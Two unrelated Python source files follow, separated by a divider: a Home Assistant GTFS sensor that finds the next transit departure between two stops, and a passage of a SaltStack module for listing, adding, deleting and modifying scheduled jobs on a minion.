ATTR_DROP_OFF_ORIGIN = 'origin_stop_drop_off_type_state'
ATTR_INFO = 'info'
ATTR_OFFSET = CONF_OFFSET
ATTR_LAST = 'last'
ATTR_LOCATION_DESTINATION = 'destination_station_location_type_name'
ATTR_LOCATION_ORIGIN = 'origin_station_location_type_name'
ATTR_PICKUP_DESTINATION = 'destination_stop_pickup_type_state'
ATTR_PICKUP_ORIGIN = 'origin_stop_pickup_type_state'
ATTR_ROUTE_TYPE = 'route_type_name'
ATTR_TIMEPOINT_DESTINATION = 'destination_stop_timepoint_exact'
ATTR_TIMEPOINT_ORIGIN = 'origin_stop_timepoint_exact'
ATTR_WHEELCHAIR = 'trip_wheelchair_access_available'
ATTR_WHEELCHAIR_DESTINATION = \
'destination_station_wheelchair_boarding_available'
ATTR_WHEELCHAIR_ORIGIN = 'origin_station_wheelchair_boarding_available'
CONF_DATA = 'data'
CONF_DESTINATION = 'destination'
CONF_ORIGIN = 'origin'
CONF_TOMORROW = 'include_tomorrow'
DEFAULT_NAME = 'GTFS Sensor'
DEFAULT_PATH = 'gtfs'
BICYCLE_ALLOWED_DEFAULT = STATE_UNKNOWN
BICYCLE_ALLOWED_OPTIONS = {
1: True,
2: False,
}
DROP_OFF_TYPE_DEFAULT = STATE_UNKNOWN
DROP_OFF_TYPE_OPTIONS = {
0: 'Regular',
1: 'Not Available',
2: 'Call Agency',
3: 'Contact Driver',
}
ICON = 'mdi:train'
ICONS = {
0: 'mdi:tram',
1: 'mdi:subway',
2: 'mdi:train',
3: 'mdi:bus',
4: 'mdi:ferry',
5: 'mdi:train-variant',
6: 'mdi:gondola',
7: 'mdi:stairs',
}
LOCATION_TYPE_DEFAULT = 'Stop'
LOCATION_TYPE_OPTIONS = {
0: 'Station',
1: 'Stop',
2: "Station Entrance/Exit",
3: 'Other',
}
PICKUP_TYPE_DEFAULT = STATE_UNKNOWN
PICKUP_TYPE_OPTIONS = {
0: 'Regular',
1: "None Available",
2: "Call Agency",
3: "Contact Driver",
}
ROUTE_TYPE_OPTIONS = {
0: 'Tram',
1: 'Subway',
2: 'Rail',
3: 'Bus',
4: 'Ferry',
5: "Cable Tram",
6: "Aerial Lift",
7: 'Funicular',
}
TIMEPOINT_DEFAULT = True
TIMEPOINT_OPTIONS = {
0: False,
1: True,
}
WHEELCHAIR_ACCESS_DEFAULT = STATE_UNKNOWN
WHEELCHAIR_ACCESS_OPTIONS = {
1: True,
2: False,
}
WHEELCHAIR_BOARDING_DEFAULT = STATE_UNKNOWN
WHEELCHAIR_BOARDING_OPTIONS = {
1: True,
2: False,
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ # type: ignore
vol.Required(CONF_ORIGIN): cv.string,
vol.Required(CONF_DESTINATION): cv.string,
vol.Required(CONF_DATA): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_OFFSET, default=0): cv.time_period,
vol.Optional(CONF_TOMORROW, default=False): cv.boolean,
})
def get_next_departure(schedule: Any, start_station_id: Any,
end_station_id: Any, offset: cv.time_period,
include_tomorrow: bool = False) -> dict:
"""Get the next departure for the given schedule."""
now = datetime.datetime.now() + offset
now_date = now.strftime(dt_util.DATE_STR_FORMAT)
yesterday = now - datetime.timedelta(days=1)
yesterday_date = yesterday.strftime(dt_util.DATE_STR_FORMAT)
tomorrow = now + datetime.timedelta(days=1)
tomorrow_date = tomorrow.strftime(dt_util.DATE_STR_FORMAT)
from sqlalchemy.sql import text
# Fetch all departures for yesterday, today and optionally tomorrow,
# up to an overkill maximum in case of a departure every minute for those
# days.
limit = 24 * 60 * 60 * 2
tomorrow_select = tomorrow_where = tomorrow_order = ''
if include_tomorrow:
limit = int(limit / 2 * 3)
tomorrow_name = tomorrow.strftime('%A').lower()
tomorrow_select = "calendar.{} AS tomorrow,".format(tomorrow_name)
tomorrow_where = "OR calendar.{} = 1".format(tomorrow_name)
tomorrow_order = "calendar.{} DESC,".format(tomorrow_name)
sql_query = """
SELECT trip.trip_id, trip.route_id,
time(origin_stop_time.arrival_time) AS origin_arrival_time,
time(origin_stop_time.departure_time) AS origin_depart_time,
date(origin_stop_time.departure_time) AS origin_depart_date,
origin_stop_time.drop_off_type AS origin_drop_off_type,
origin_stop_time.pickup_type AS origin_pickup_type,
origin_stop_time.shape_dist_traveled AS origin_dist_traveled,
origin_stop_time.stop_headsign AS origin_stop_headsign,
origin_stop_time.stop_sequence AS origin_stop_sequence,
origin_stop_time.timepoint AS origin_stop_timepoint,
time(destination_stop_time.arrival_time) AS dest_arrival_time,
time(destination_stop_time.departure_time) AS dest_depart_time,
destination_stop_time.drop_off_type AS dest_drop_off_type,
destination_stop_time.pickup_type AS dest_pickup_type,
destination_stop_time.shape_dist_traveled AS dest_dist_traveled,
destination_stop_time.stop_headsign AS dest_stop_headsign,
destination_stop_time.stop_sequence AS dest_stop_sequence,
destination_stop_time.timepoint AS dest_stop_timepoint,
calendar.{yesterday_name} AS yesterday,
calendar.{today_name} AS today,
{tomorrow_select}
calendar.start_date AS start_date,
calendar.end_date AS end_date
FROM trips trip
INNER JOIN calendar calendar
ON trip.service_id = calendar.service_id
INNER JOIN stop_times origin_stop_time
ON trip.trip_id = origin_stop_time.trip_id
INNER JOIN stops start_station
ON origin_stop_time.stop_id = start_station.stop_id
INNER JOIN stop_times destination_stop_time
ON trip.trip_id = destination_stop_time.trip_id
INNER JOIN stops end_station
ON destination_stop_time.stop_id = end_station.stop_id
WHERE (calendar.{yesterday_name} = 1
OR calendar.{today_name} = 1
{tomorrow_where}
)
AND start_station.stop_id = :origin_station_id
AND end_station.stop_id = :end_station_id
AND origin_stop_sequence < dest_stop_sequence
AND calendar.start_date <= :today
AND calendar.end_date >= :today
ORDER BY calendar.{yesterday_name} DESC,
calendar.{today_name} DESC,
{tomorrow_order}
origin_stop_time.departure_time
LIMIT :limit
""".format(yesterday_name=yesterday.strftime('%A').lower(),
today_name=now.strftime('%A').lower(),
tomorrow_select=tomorrow_select,
tomorrow_where=tomorrow_where,
tomorrow_order=tomorrow_order)
result = schedule.engine.execute(text(sql_query),
origin_station_id=start_station_id,
end_station_id=end_station_id,
today=now_date,
limit=limit)
# Create lookup timetable for today and possibly tomorrow, taking into
# account any departures from yesterday scheduled after midnight,
# as long as all departures are within the calendar date range.
timetable = {}
yesterday_start = today_start = tomorrow_start = None
yesterday_last = today_last = ''
for row in result:
if row['yesterday'] == 1 and yesterday_date >= row['start_date']:
extras = {
'day': 'yesterday',
'first': None,
'last': False,
}
if yesterday_start is None:
yesterday_start = row['origin_depart_date']
if yesterday_start != row['origin_depart_date']:
idx = '{} {}'.format(now_date,
row['origin_depart_time'])
timetable[idx] = {**row, **extras}
yesterday_last = idx
if row['today'] == 1:
extras = {
'day': 'today',
'first': False,
'last': False,
}
if today_start is None:
today_start = row['origin_depart_date']
extras['first'] = True
if today_start == row['origin_depart_date']:
idx_prefix = now_date
else:
idx_prefix = tomorrow_date
idx = '{} {}'.format(idx_prefix, row['origin_depart_time'])
timetable[idx] = {**row, **extras}
today_last = idx
if 'tomorrow' in row and row['tomorrow'] == 1 and tomorrow_date <= \
row['end_date']:
extras = {
'day': 'tomorrow',
'first': False,
'last': None,
}
if tomorrow_start is None:
tomorrow_start = row['origin_depart_date']
extras['first'] = True
if tomorrow_start == row['origin_depart_date']:
idx = '{} {}'.format(tomorrow_date,
row['origin_depart_time'])
timetable[idx] = {**row, **extras}
# Flag last departures.
for idx in filter(None, [yesterday_last, today_last]):
timetable[idx]['last'] = True
_LOGGER.debug("Timetable: %s", sorted(timetable.keys()))
item = {} # type: dict
for key in sorted(timetable.keys()):
if dt_util.parse_datetime(key) > now:
item = timetable[key]
_LOGGER.debug("Departure found for station %s @ %s -> %s",
start_station_id, key, item)
break
if item == {}:
return {}
# Format arrival and departure dates and times, accounting for the
# possibility of times crossing over midnight.
origin_arrival = now
if item['origin_arrival_time'] > item['origin_depart_time']:
origin_arrival -= datetime.timedelta(days=1)
origin_arrival_time = '{} {}'.format(
origin_arrival.strftime(dt_util.DATE_STR_FORMAT),
item['origin_arrival_time'])
origin_depart_time = '{} {}'.format(now_date, item['origin_depart_time'])
dest_arrival = now
if item['dest_arrival_time'] < item['origin_depart_time']:
dest_arrival += datetime.timedelta(days=1)
dest_arrival_time = '{} {}'.format(
dest_arrival.strftime(dt_util.DATE_STR_FORMAT),
item['dest_arrival_time'])
dest_depart = dest_arrival
if item['dest_depart_time'] < item['dest_arrival_time']:
dest_depart += datetime.timedelta(days=1)
dest_depart_time = '{} {}'.format(
dest_depart.strftime(dt_util.DATE_STR_FORMAT),
item['dest_depart_time'])
depart_time = dt_util.parse_datetime(origin_depart_time)
arrival_time = dt_util.parse_datetime(dest_arrival_time)
origin_stop_time = {
'Arrival Time': origin_arrival_time,
'Departure Time': origin_depart_time,
'Drop Off Type': item['origin_drop_off_type'],
'Pickup Type': item['origin_pickup_type'],
'Shape Dist Traveled': item['origin_dist_traveled'],
'Headsign': item['origin_stop_headsign'],
'Sequence': item['origin_stop_sequence'],
'Timepoint': item['origin_stop_timepoint'],
}
destination_stop_time = {
'Arrival Time': dest_arrival_time,
'Departure Time': dest_depart_time,
'Drop Off Type': item['dest_drop_off_type'],
'Pickup Type': item['dest_pickup_type'],
'Shape Dist Traveled': item['dest_dist_traveled'],
'Headsign': item['dest_stop_headsign'],
'Sequence': item['dest_stop_sequence'],
'Timepoint': item['dest_stop_timepoint'],
}
return {
'trip_id': item['trip_id'],
'route_id': item['route_id'],
'day': item['day'],
'first': item['first'],
'last': item['last'],
'departure_time': depart_time,
'arrival_time': arrival_time,
'origin_stop_time': origin_stop_time,
'destination_stop_time': destination_stop_time,
}
def setup_platform(hass: HomeAssistantType, config: ConfigType,
add_entities: Callable[[list], None],
discovery_info: Optional[dict] = None) -> None:
"""Set up the GTFS sensor."""
gtfs_dir = hass.config.path(DEFAULT_PATH)
data = config[CONF_DATA]
origin = config.get(CONF_ORIGIN)
destination = config.get(CONF_DESTINATION)
name = config.get(CONF_NAME)
offset = config.get(CONF_OFFSET)
include_tomorrow = config[CONF_TOMORROW]
if not os.path.exists(gtfs_dir):
os.makedirs(gtfs_dir)
if not os.path.exists(os.path.join(gtfs_dir, data)):
_LOGGER.error("The given GTFS data file/folder was not found")
return
import pygtfs
(gtfs_root, _) = os.path.splitext(data)
sqlite_file = "{}.sqlite?check_same_thread=False".format(gtfs_root)
joined_path = os.path.join(gtfs_dir, sqlite_file)
gtfs = pygtfs.Schedule(joined_path)
# pylint: disable=no-member
if not gtfs.feeds:
pygtfs.append_feed(gtfs, os.path.join(gtfs_dir, data))
add_entities([
GTFSDepartureSensor(gtfs, name, origin, destination, offset,
include_tomorrow)])
class GTFSDepartureSensor(Entity):
"""Implementation of a GTFS departure sensor."""
def __init__(self, pygtfs: Any, name: Optional[Any], origin: Any,
destination: Any, offset: cv.time_period,
include_tomorrow: bool) -> None:
"""Initialize the sensor."""
self._pygtfs = pygtfs
self.origin = origin
self.destination = destination
self._include_tomorrow = include_tomorrow
self._offset = offset
self._custom_name = name
self._available = False
self._icon = ICON
self._name = ''
self._state = None # type: Optional[str]
self._attributes = {} # type: dict
self._agency = None
self._departure = {} # type: dict
self._destination = None
self._origin = None
self._route = None
self._trip = None
self.lock = threading.Lock()
self.update()
@property
def name(self) -> str:
"""Return the name of the sensor."""
return self._name
@property
def state(self) -> Optional[str]: # type: ignore
"""Return the state of the sensor."""
return self._state
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self) -> dict:
"""Return the state attributes."""
return self._attributes
@property
def icon(self) -> str:
"""Icon to use in the frontend, if any."""
return self._icon
@property
def device_class(self) -> str:
"""Return the class of this device."""
return DEVICE_CLASS_TIMESTAMP
def update(self) -> None:
"""Get the latest data from GTFS and update the states."""
with self.lock:
# Fetch valid stop information once
if not self._origin:
stops = self._pygtfs.stops_by_id(self.origin)
if not stops:
self._available = False
_LOGGER.warning("Origin stop ID %s not found", self.origin)
return
self._origin = stops[0]
if not self._destination:
stops = self._pygtfs.stops_by_id(self.destination)
if not stops:
self._available = False
_LOGGER.warning("Destination stop ID %s not found",
self.destination)
return
self._destination = stops[0]
self._available = True
# Fetch next departure
self._departure = get_next_departure(
self._pygtfs, self.origin, self.destination, self._offset,
self._include_tomorrow)
# Define the state as a UTC timestamp with ISO 8601 format
if not self._departure:
self._state = None
else:
self._state = dt_util.as_utc(
self._departure['departure_time']).isoformat()
# Fetch trip and route details once, unless updated
if not self._departure:
self._trip = None
else:
trip_id = self._departure['trip_id']
if not self._trip or self._trip.trip_id != trip_id:
_LOGGER.debug("Fetching trip details for %s", trip_id)
self._trip = self._pygtfs.trips_by_id(trip_id)[0]
route_id = self._departure['route_id']
if not self._route or self._route.route_id != route_id:
_LOGGER.debug("Fetching route details for %s", route_id)
self._route = self._pygtfs.routes_by_id(route_id)[0]
# Fetch agency details exactly once
if self._agency is None and self._route:
_LOGGER.debug("Fetching agency details for %s",
self._route.agency_id)
try:
self._agency = self._pygtfs.agencies_by_id(
self._route.agency_id)[0]
except IndexError:
_LOGGER.warning(
"Agency ID '%s' was not found in agency table, "
"you may want to update the routes database table "
"to fix this missing reference",
self._route.agency_id)
self._agency = False
# Assign attributes, icon and name
self.update_attributes()
if self._route:
self._icon = ICONS.get(self._route.route_type, ICON)
else:
self._icon = ICON
name = '{agency} {origin} to {destination} next departure'
if not self._departure:
name = '{default}'
self._name = (self._custom_name or
name.format(agency=getattr(self._agency,
'agency_name',
DEFAULT_NAME),
default=DEFAULT_NAME,
origin=self.origin,
destination=self.destination))
def update_attributes(self) -> None:
"""Update state attributes."""
# Add departure information
if self._departure:
self._attributes[ATTR_ARRIVAL] = dt_util.as_utc(
self._departure['arrival_time']).isoformat()
self._attributes[ATTR_DAY] = self._departure['day']
if self._departure[ATTR_FIRST] is not None:
self._attributes[ATTR_FIRST] = self._departure['first']
elif ATTR_FIRST in self._attributes:
del self._attributes[ATTR_FIRST]
if self._departure[ATTR_LAST] is not None:
self._attributes[ATTR_LAST] = self._departure['last']
elif ATTR_LAST in self._attributes:
del self._attributes[ATTR_LAST]
else:
if ATTR_ARRIVAL in self._attributes:
del self._attributes[ATTR_ARRIVAL]
if ATTR_DAY in self._attributes:
del self._attributes[ATTR_DAY]
if ATTR_FIRST in self._attributes:
del self._attributes[ATTR_FIRST]
if ATTR_LAST in self._attributes:
del self._attributes[ATTR_LAST]
# Add contextual information
self._attributes[ATTR_OFFSET] = self._offset.seconds / 60
if self._state is None:
self._attributes[ATTR_INFO] = "No more departures" if \
self._include_tomorrow else "No more departures today"
elif ATTR_INFO in self._attributes:
del self._attributes[ATTR_INFO]
if self._agency:
self._attributes[ATTR_ATTRIBUTION] = self._agency.agency_name
elif ATTR_ATTRIBUTION in self._attributes:
del self._attributes[ATTR_ATTRIBUTION]
# Add extra metadata
key = 'agency_id'
if self._agency and key not in self._attributes:
self.append_keys(self.dict_for_table(self._agency), 'Agency')
key = 'origin_station_stop_id'
if self._origin and key not in self._attributes:
self.append_keys(self.dict_for_table(self._origin),
"Origin Station")
self._attributes[ATTR_LOCATION_ORIGIN] = \
LOCATION_TYPE_OPTIONS.get(
self._origin.location_type,
LOCATION_TYPE_DEFAULT)
self._attributes[ATTR_WHEELCHAIR_ORIGIN] = \
WHEELCHAIR_BOARDING_OPTIONS.get(
self._origin.wheelchair_boarding,
WHEELCHAIR_BOARDING_DEFAULT)
key = 'destination_station_stop_id'
if self._destination and key not in self._attributes:
self.append_keys(self.dict_for_table(self._destination),
"Destination Station")
self._attributes[ATTR_LOCATION_DESTINATION] = \
LOCATION_TYPE_OPTIONS.get(
self._destination.location_type,
LOCATION_TYPE_DEFAULT)
self._attributes[ATTR_WHEELCHAIR_DESTINATION] = \
WHEELCHAIR_BOARDING_OPTIONS.get(
self._destination.wheelchair_boarding,
WHEELCHAIR_BOARDING_DEFAULT)
# Manage Route metadata
key = 'route_id'
if not self._route and key in self._attributes:
self.remove_keys('Route')
elif self._route and (key not in self._attributes or
self._attributes[key] != self._route.route_id):
self.append_keys(self.dict_for_table(self._route), 'Route')
self._attributes[ATTR_ROUTE_TYPE] = \
ROUTE_TYPE_OPTIONS[self._route.route_type]
# Manage Trip metadata
key = 'trip_id'
if not self._trip and key in self._attributes:
self.remove_keys('Trip')
elif self._trip and (key not in self._attributes or
self._attributes[key] != self._trip.trip_id):
self.append_keys(self.dict_for_table(self._trip), 'Trip')
self._attributes[ATTR_BICYCLE] = BICYCLE_ALLOWED_OPTIONS.get(
self._trip.bikes_allowed,
BICYCLE_ALLOWED_DEFAULT)
self._attributes[ATTR_WHEELCHAIR] = WHEELCHAIR_ACCESS_OPTIONS.get(
self._trip.wheelchair_accessible,
WHEELCHAIR_ACCESS_DEFAULT)
# Manage Stop Times metadata
prefix = 'origin_stop'
if self._departure:
self.append_keys(self._departure['origin_stop_time'], prefix)
self._attributes[ATTR_DROP_OFF_ORIGIN] = DROP_OFF_TYPE_OPTIONS.get(
self._departure['origin_stop_time']['Drop Off Type'],
DROP_OFF_TYPE_DEFAULT)
self._attributes[ATTR_PICKUP_ORIGIN] = PICKUP_TYPE_OPTIONS.get(
self._departure['origin_stop_time']['Pickup Type'],
PICKUP_TYPE_DEFAULT)
self._attributes[ATTR_TIMEPOINT_ORIGIN] = TIMEPOINT_OPTIONS.get(
self._departure['origin_stop_time']['Timepoint'],
TIMEPOINT_DEFAULT)
else:
self.remove_keys(prefix)
prefix = 'destination_stop'
if self._departure:
self.append_keys(self._departure['destination_stop_time'], prefix)
self._attributes[ATTR_DROP_OFF_DESTINATION] = \
DROP_OFF_TYPE_OPTIONS.get(
self._departure['destination_stop_time']['Drop Off Type'],
DROP_OFF_TYPE_DEFAULT)
self._attributes[ATTR_PICKUP_DESTINATION] = \
PICKUP_TYPE_OPTIONS.get(
self._departure['destination_stop_time']['Pickup Type'],
PICKUP_TYPE_DEFAULT)
self._attributes[ATTR_TIMEPOINT_DESTINATION] = \
TIMEPOINT_OPTIONS.get(
self._departure['destination_stop_time']['Timepoint'],
TIMEPOINT_DEFAULT)
else:
self.remove_keys(prefix)
@staticmethod
def dict_for_table(resource: Any) -> dict:
"""Return a dictionary for the SQLAlchemy resource given."""
return dict((col, getattr(resource, col))
for col in resource.__table__.columns.keys())
def append_keys(self, resource: dict, prefix: Optional[str] = None) -> \
None:
"""Properly format key val pairs to append to attributes."""
for attr, val in resource.items():
if val == '' or val is None or attr == 'feed_id':
continue
key = attr
if prefix and not key.startswith(prefix):
key = '{} {}'.format(prefix, key)
key = slugify(key)
self._attributes[key] = val
def remove_keys(self, prefix: str) -> None:
"""Remove attributes whose key starts with prefix."""
self._attributes = {k: v for k, v in self._attributes.items() if
not k.startswith(prefix)}
|
|
# -*- coding: utf-8 -*-
'''
Module for managing the Salt schedule on a minion
.. versionadded:: 2014.7.0
'''
# Import Python libs
from __future__ import absolute_import
import copy as pycopy
import difflib
import os
import yaml
# Import salt libs
import salt.utils
import salt.utils.odict
# Import 3rd-party libs
import salt.ext.six as six
__proxyenabled__ = ['*']
import logging
log = logging.getLogger(__name__)
__func_alias__ = {
'list_': 'list',
'reload_': 'reload'
}
SCHEDULE_CONF = [
'name',
'maxrunning',
'function',
'splay',
'range',
'when',
'once',
'once_fmt',
'returner',
'jid_include',
'args',
'kwargs',
'_seconds',
'seconds',
'minutes',
'hours',
'days',
'enabled',
'return_job',
'metadata',
'cron',
'until',
'after',
'return_config',
'return_kwargs'
]
def list_(show_all=False,
show_disabled=True,
where=None,
return_yaml=True):
'''
List the jobs currently scheduled on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.list
# Show all jobs including hidden internal jobs
salt '*' schedule.list show_all=True
# Hide disabled jobs from list of jobs
salt '*' schedule.list show_disabled=False
'''
schedule = {}
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'list',
'where': where}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_list_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret = {}
ret['comment'] = 'Event module not available. Schedule list failed.'
ret['result'] = True
log.debug('Event module not available. Schedule list failed.')
return ret
for job in list(schedule.keys()): # iterate over a copy since we will mutate it
if job == 'enabled':
continue
# Default jobs added by salt begin with __
# by default hide them unless show_all is True.
if job.startswith('__') and not show_all:
del schedule[job]
continue
# if enabled is not included in the job,
# assume job is enabled.
if 'enabled' not in schedule[job]:
schedule[job]['enabled'] = True
for item in pycopy.copy(schedule[job]):
if item not in SCHEDULE_CONF:
del schedule[job][item]
continue
if schedule[job][item] == 'true':
schedule[job][item] = True
if schedule[job][item] == 'false':
schedule[job][item] = False
# if the job is disabled and show_disabled is False, skip job
if not show_disabled and not schedule[job]['enabled']:
del schedule[job]
continue
if '_seconds' in schedule[job]:
# if _seconds is greater than zero
# then include the original back in seconds.
# otherwise remove seconds from the listing as the
# original item didn't include it.
if schedule[job]['_seconds'] > 0:
schedule[job]['seconds'] = schedule[job]['_seconds']
elif 'seconds' in schedule[job]:
del schedule[job]['seconds']
# remove _seconds from the listing
del schedule[job]['_seconds']
if schedule:
if return_yaml:
tmp = {'schedule': schedule}
yaml_out = yaml.safe_dump(tmp, default_flow_style=False)
return yaml_out
else:
return schedule
else:
return {'schedule': {}}
def is_enabled(name):
'''
List a Job only if its enabled
.. versionadded:: 2015.5.3
CLI Example:
.. code-block:: bash
salt '*' schedule.is_enabled name=job_name
'''
current_schedule = __salt__['schedule.list'](show_all=False, return_yaml=False)
if name in current_schedule:
return current_schedule[name]
else:
return {}
def purge(**kwargs):
'''
Purge all the jobs currently scheduled on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.purge
'''
ret = {'comment': [],
'result': True}
for name in list_(show_all=True, return_yaml=False):
if name == 'enabled':
continue
if name.startswith('__'):
continue
if 'test' in kwargs and kwargs['test']:
ret['result'] = True
ret['comment'].append('Job: {0} would be deleted from schedule.'.format(name))
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'name': name,
'func': 'delete',
'persist': persist}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_delete_complete', wait=30)
if event_ret and event_ret['complete']:
_schedule_ret = event_ret['schedule']
if name not in _schedule_ret:
ret['result'] = True
ret['comment'].append('Deleted job: {0} from schedule.'.format(name))
else:
ret['comment'].append('Failed to delete job {0} from schedule.'.format(name))
ret['result'] = True
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule add failed.'
ret['result'] = True
return ret
def delete(name, **kwargs):
'''
Delete a job from the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.delete job1
'''
ret = {'comment': 'Failed to delete job {0} from schedule.'.format(name),
'result': False}
if not name:
ret['comment'] = 'Job name is required.'
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be deleted from schedule.'.format(name)
ret['result'] = True
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'delete', 'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name, 'where': 'pillar', 'func': 'delete', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_delete_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if name not in schedule:
ret['result'] = True
ret['comment'] = 'Deleted Job {0} from schedule.'.format(name)
else:
ret['comment'] = 'Failed to delete job {0} from schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule add failed.'
return ret
def build_schedule_item(name, **kwargs):
'''
Build a schedule job
CLI Example:
.. code-block:: bash
salt '*' schedule.build_schedule_item job1 function='test.ping' seconds=3600
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
return ret
schedule = {}
schedule[name] = salt.utils.odict.OrderedDict()
schedule[name]['function'] = kwargs['function']
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['result'] = False
ret['comment'] = 'Unable to use "seconds", "minutes", "hours", or "days" with "when" or "cron" options.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['result'] = False
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs:
schedule[name][item] = kwargs[item]
if 'return_job' in kwargs:
schedule[name]['return_job'] = kwargs['return_job']
if 'metadata' in kwargs:
schedule[name]['metadata'] = kwargs['metadata']
if 'job_args' in kwargs:
schedule[name]['args'] = kwargs['job_args']
if 'job_kwargs' in kwargs:
schedule[name]['kwargs'] = kwargs['job_kwargs']
if 'maxrunning' in kwargs:
schedule[name]['maxrunning'] = kwargs['maxrunning']
else:
schedule[name]['maxrunning'] = 1
if 'name' in kwargs:
schedule[name]['name'] = kwargs['name']
else:
schedule[name]['name'] = name
if 'enabled' in kwargs:
schedule[name]['enabled'] = kwargs['enabled']
else:
schedule[name]['enabled'] = True
if 'jid_include' not in kwargs or kwargs['jid_include']:
schedule[name]['jid_include'] = True
if 'splay' in kwargs:
if isinstance(kwargs['splay'], dict):
# Ensure ordering of start and end arguments
schedule[name]['splay'] = salt.utils.odict.OrderedDict()
schedule[name]['splay']['start'] = kwargs['splay']['start']
schedule[name]['splay']['end'] = kwargs['splay']['end']
else:
schedule[name]['splay'] = kwargs['splay']
for item in ['range', 'when', 'once', 'once_fmt', 'cron', 'returner',
'return_config', 'return_kwargs', 'until', 'enabled']:
if item in kwargs:
schedule[name][item] = kwargs[item]
# if enabled is not included in the job,
# assume job is enabled.
if 'enabled' not in kwargs:
schedule[name]['enabled'] = True
return schedule[name]
def add(name, **kwargs):
'''
Add a job to the schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.add job1 function='test.ping' seconds=3600
# If function have some arguments, use job_args
salt '*' schedule.add job2 function='cmd.run' job_args="['date >> /tmp/date.log']" seconds=60
'''
ret = {'comment': 'Failed to add job {0} to schedule.'.format(name),
'result': False}
if name in list_(show_all=True, return_yaml=False):
ret['comment'] = 'Job {0} already exists in schedule.'.format(name)
ret['result'] = False
return ret
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['comment'] = 'Error: Unable to use "seconds", "minutes", "hours", or "days" with "when" or "cron" options.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
_new = build_schedule_item(name, **kwargs)
schedule_data = {}
schedule_data[name] = _new
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be added to schedule.'.format(name)
ret['result'] = True
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'name': name,
'schedule': schedule_data,
'func': 'add',
'persist': persist}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_add_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if name in schedule:
ret['result'] = True
ret['comment'] = 'Added job: {0} to schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule add failed.'
return ret
def modify(name, **kwargs):
'''
Modify an existing job in the schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.modify job1 function='test.ping' seconds=3600
'''
ret = {'comment': '',
'changes': {},
'result': True}
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['result'] = False
ret['comment'] = 'Error: Unable to use "seconds", "minutes", "hours", or "days" with "when" option.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['result'] = False
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
current_schedule = list_(show_all=True, return_yaml=False)
if name not in current_schedule:
ret['comment'] = 'Job {0} does not exist in schedule.'.format(name)
ret['result'] = False
return ret
_current = current_schedule[name]
if '_seconds' in _current:
_current['seconds'] = _current['_seconds']
del _current['_seconds']
_new = build_schedule_item(name, **kwargs)
if _new == _current:
ret['comment'] = 'Job {0} in correct state'.format(name)
return ret
_current_lines = ['{0}:{1}\n'.format(key, value)
for (key, value) in sorted(_current.items())]
_new_lines = ['{0}:{1}\n'.format(key, value)
for (key, value) in sorted(_new.items())]
_diff = difflib.unified_diff(_current_lines, _new_lines)
ret['changes']['diff'] = ''.join(_diff)
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be modified in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name,
'schedule': _new,
'func': 'modify',
'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name,
'schedule': _new,
'where': 'pillar',
